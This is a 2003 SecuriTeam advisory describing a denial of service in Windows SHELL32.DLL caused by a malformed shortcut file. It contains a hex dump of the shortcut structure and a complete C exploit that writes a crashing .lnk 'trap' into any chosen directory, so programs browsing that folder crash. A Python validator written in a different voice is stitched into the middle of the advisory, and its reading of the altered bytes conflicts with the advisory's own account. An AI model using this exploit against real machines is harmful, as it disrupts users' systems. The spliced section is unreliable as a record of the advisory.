[NT] SHELL32.DLL Denial of Service

From: SecuriTeam (support_at_securiteam.com)
Date: 12/11/03

    To: list@securiteam.com
    Date: 11 Dec 2003 12:05:55 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      SHELL32.DLL Denial of Service
    ------------------------------------------------------------------------

    SUMMARY

    Attackers can turn a medium (a directory, a drive, a mail message, ...) into a
    small attacking program, allowing it to crash any application that tries to
    access it through the SHELL32.DLL library (Explorer, IE, Outlook).

    DETAILS

    As a user browses through his hard drive, Windows automatically analyses
    every file in the current directory so that the system can display the
    matching icon as well as the file information.

    When Windows must analyse a shortcut (*.lnk), the system determines the
    properties of the file indicated by the link using its structure (see:
    <http://www.I2S-LAB.com/Papers/The_Windows_Shortcut_File_Format.pdf> The
    Windows Shortcut File Format).

    Here is the structure of a Windows link as we have understood it:
    +-------------------------------------------------------------------+
    | Shortcut HEADER |
    +-------------------------------------------------------------------+
    00000000 4C00 0000 L... 'L' Magic value

    00000004 0114 0200 .... GUID of shortcut files
    00000008 0000 0000 ....
    0000000C C000 0000 ....
    00000010 0000 0046 ...F
       
    00000014 8900 0000 .... Flag

    00000018 2000 0000 ... File attribute

    0000001C A0C3 D5A8 .... Time 1
    00000020 478E C301 G...

    00000024 A0C3 D5A8 .... Time 2
    00000028 478E C301 G...

    0000002C A0C3 D5A8 .... Time 3
    00000030 478E C301 G...

    00000034 0000 0000 .... File length (here 0 bytes)
    00000038 0000 0000 .... Icon number (no icon for us)
    0000003C 0100 0000 .... Normal window
    00000040 0000 0000 .... shortcut (no)
    00000044 0000 0000 .... unknown/reserved
    00000048 0000 0000 .... unknown/reserved

    +-------------------------------------------------------------------+
    | Item Id List |
    +-------------------------------------------------------------------+

    0000004C 4600 F. Size of item id list

    +-------------------------------------------------------------------+
    | First item |
    +-------------------------------------------------------------------+

    0000004E 1400 .. Length of first item
    00000050 1F50 .P ???
    00000052 E04F D020 .O. File length
    00000056 EA3A 6910 .:i. ???

    +-------------------------------------------------------------------+
    | data... |
    +-------------------------------------------------------------------+

    0000005A A2D8 0800 2B30 309D 1900 2343 3A5C 0000 ....+00...#C:\..
    0000006A 0000 0000 0000 0000 0000 0000 0000 0051 ...............Q
    0000007A 8417 0032 0000 0000 0049 2F87 4B20 006B ...2.....I/.K .k
    0000008A 7574 2E74 7874 0000 ut.txt..

    +-------------------------------------------------------------------+
    | vulnerable bytes |
    +-------------------------------------------------------------------+

    00000092 0000 0900 .... name length
    00000096 2E00 ..

    00000098 5C00 6B00 7500 7400 2E00 7400 7800 7400 \.k.u.t...t.x.t. name in wide chars

    +-------------------------------------------------------------------+
    | data... |
    +-------------------------------------------------------------------+

    000000A8 6000 0000 0300 00A0 5800 0000 0000 0000 `.......X.......
    000000B8 6932 732D 7732 6B00 0000 0000 0000 0000 i2s-w2k.........
    000000C8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
    000000D8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
    000000E8 6EA1 E9B2 1B23 6B46 B804 8E43 F338 56F0 n....#kF...C.8V.
    000000F8 0EDC EB90 A1F8 D711 A41B 00EE B000 DAC9 ................
    00000108 0000 0000 00 .....

    If we modify the name length at offset 0x92, SHELL32.DLL raises an access
    violation error, because text is written beyond the end of the buffer
    allocated on the heap for this operation.

    Exploit:
    /****************************************
     * TrapLink for SHELL32.DLL DoS Exploit *
     ****************************************
          Discovered & coded by I2S-LaB

     ________________________________________
     
          URL : http://www.I2S-LaB.com
          MAIL: contact[at]I2S-LaB.com
     ________________________________________

    *****************************************/

    #include <windows.h>
    #include <stdio.h>

    int main (int argc, char *argv[])
    {
      HANDLE TrapFile;
      DWORD NumberOfBytesWritten;

      /* The shortcut from the dump above; the two bytes at offset 0x92
         are FF FF instead of 00 00 (the length field discussed above). */
      unsigned char LnkCrash[] =

      "\x4C\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xC0\x00\x00\x00"
      "\x00\x00\x00\x46\x89\x00\x00\x00\x20\x00\x00\x00\xA0\xC3\xD5\xA8"
      "\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8\x47\x8E\xC3\x01\xA0\xC3\xD5\xA8"
      "\x47\x8E\xC3\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x46\x00\x14\x00"
      "\x1F\x50\xE0\x4F\xD0\x20\xEA\x3A\x69\x10\xA2\xD8\x08\x00\x2B\x30"
      "\x30\x9D\x19\x00\x23\x43\x3A\x5C\x00\x00\x00\x00\x00\x00\x00\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x51\x84\x17\x00\x32\x00\x00"
      "\x00\x00\x00\x49\x2F\x87\x4B\x20\x00\x6B\x75\x74\x2E\x74\x78\x74"
      "\x00\x00\xFF\xFF\x09\x00\x2E\x00\x5C\x00\x6B\x00\x75\x00\x74\x00"
      "\x2E\x00\x74\x00\x78\x00\x74\x00\x60\x00\x00\x00\x03\x00\x00\xA0"
      "\x58\x00\x00\x00\x00\x00\x00\x00\x69\x32\x73\x2D\x77\x32\x6B\x00"
      "\x00\x00\x00\x00\x00\x00\x00\x00\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
      "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
      "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x6E\xA1\xE9\xB2\x1B\x23\x6B\x46"
      "\xB8\x04\x8E\x43\xF3\x38\x56\xF0\x0E\xDC\xEB\x90\xA1\xF8\xD7\x11"
      "\xA4\x1B\x00\xEE\xB0\x00\xDA\xC9\x00\x00\x00\x00";

      printf ("################################\n"
        "TrapLink SHELL32.dll DoS exploit\n"
        "################################\n"
        "By I2S-LAB Team.\n\n"
        "http://www.I2S-LaB.com\n\n" );

      if (argc < 2)
      {
        printf ("Usage : %s <path to trap>\n", argv[0]);
        return 1;
      }

      if ( !SetCurrentDirectory(argv[1]) )
      {
        printf ("Error : %s is not a valid directory to trap\n", argv[1] );
        return 1;
      }

      TrapFile = CreateFile("I2S-Crash.lnk",
        GENERIC_WRITE, 0,
        NULL, CREATE_ALWAYS,
        FILE_ATTRIBUTE_NORMAL, NULL );

      if (TrapFile == INVALID_HANDLE_VALUE)
      {
        printf ("Error : cannot create malicious file.\n");
        return 1;
      }

      /* sizeof includes the terminating NUL, which is the final 00 of the dump */
      WriteFile (TrapFile, LnkCrash, sizeof (LnkCrash),
                 &NumberOfBytesWritten, NULL);
      CloseHandle (TrapFile);
      printf ("%s is now trapped with a malicious LNK file\n", argv[1]);
      return 0;
    }
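    A structural checker for the shortcut layout described above, added here as an example (it is not I2S-LaB's code): it applies the bounds checks a parser needs on the Item Id List and on the string data that follows it, and a constructed sample sets the two bytes at the end of the Item Id List to 0xFFFF, mirroring the exploit's edit of the bytes at 0x92, so the checker can reject it because no item of that size fits inside the declared list. The flag bit meanings (0x01 id list present, 0x08 relative path present, 0x80 unicode strings) are taken from the public shortcut format and are assumptions here, not something the advisory states.

```python
import struct

HEADER_SIZE = 0x4C             # fixed header; the Item Id List size follows at 0x4C
FLAG_HAS_IDLIST = 0x01         # bits of the flag word at 0x14 (0x89 in the dump above)
FLAG_HAS_RELATIVE_PATH = 0x08
FLAG_IS_UNICODE = 0x80

def u16(data, pos):
    """Little-endian uint16 at pos, or None when the file is truncated there."""
    return struct.unpack_from("<H", data, pos)[0] if pos + 2 <= len(data) else None

def validate_lnk(data):
    """Return the structural problems found; an empty list means well-formed."""
    if len(data) < HEADER_SIZE or data[:4] != b"L\x00\x00\x00":
        return ["bad header size or magic"]
    flags = struct.unpack_from("<I", data, 0x14)[0]
    problems, pos = [], HEADER_SIZE
    if flags & FLAG_HAS_IDLIST:
        list_size = u16(data, pos)
        if list_size is None or pos + 2 + list_size > len(data):
            return ["item id list size exceeds file"]
        pos, list_end = pos + 2, pos + 2 + list_size
        while pos + 2 <= list_end:          # walk items up to the 0x0000 terminator
            item_size = u16(data, pos)
            if item_size == 0:
                break
            if item_size < 2 or pos + item_size > list_end:
                problems.append("item at 0x%X declares size 0x%X past end of list" % (pos, item_size))
                break
            pos += item_size
        else:                               # ran off the list without a terminator
            problems.append("item id list has no terminator")
        pos = list_end
    if flags & FLAG_HAS_RELATIVE_PATH:      # string data: 2-byte count, then the chars
        count = u16(data, pos)
        width = 2 if flags & FLAG_IS_UNICODE else 1
        if count is None or pos + 2 + count * width > len(data):
            problems.append("relative path count %s exceeds file" % count)
    return problems

def build_sample(terminator=b"\x00\x00"):
    """Constructed .lnk: flags 0x89, one 4-byte item, the given list terminator,
    then the path '.\\kut.txt'; pass b'\\xff\\xff' to mirror the advisory's edit."""
    header = bytearray(HEADER_SIZE)
    header[:4] = b"L\x00\x00\x00"
    struct.pack_into("<I", header, 0x14, 0x89)
    id_list = struct.pack("<H", 4) + b"\x1f\x50" + terminator
    path = ".\\kut.txt".encode("utf-16-le")
    return (bytes(header) + struct.pack("<H", len(id_list)) + id_list
            + struct.pack("<H", len(path) // 2) + path)
```

Run it over a directory of shortcuts before Explorer ever renders them and any file that returns a non-empty list is one a vulnerable SHELL32.DLL would have parsed past the end of its buffer.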

    Solution:
    Microsoft was notified on 11/17/2003 and is planning to fix this as part
    of the next service pack.

    ADDITIONAL INFORMATION

    The information has been provided by Aurélien BOUDOUX and Fred CHAVEROT
    <mailto:contact@i2s-lab.com> i2s-lab.com.


